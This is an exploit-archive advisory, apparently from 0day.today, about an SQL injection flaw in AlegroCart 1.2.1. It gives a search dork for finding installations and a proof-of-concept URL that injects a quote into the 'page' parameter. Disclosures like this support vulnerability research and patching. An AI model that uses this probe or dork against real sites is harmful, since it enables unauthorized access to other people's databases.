id: 11859
date: 04/18/2010
title: Alegro 1.2.1 SQL Injection Vulnerability
author: indoushka
cves: 

========================================
Alegro 1.2.1 SQL Injection Vulnerability 
========================================

========================================================================================                 
| # Title    : Alegro 1.2.1 SQL Injection Vulnerability
| # Author   : indoushka                                                              
| # email    : indoushka@hotmail.com                                                  
| # Home     : www.iqs3cur1ty.com/vb                                                                    
| # Web Site : http://www.alegrocart.com/                                            
| # Dork     : alegrocart                                                                                                          
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0)      
| # Bug      : SQL Injection                                                                
======================      Exploit By indoushka       =================================
# Exploit  :
 
1- http://localhost/Aligro/?controller=category&path=1&page='



#  0day.today [2023-03-24]  #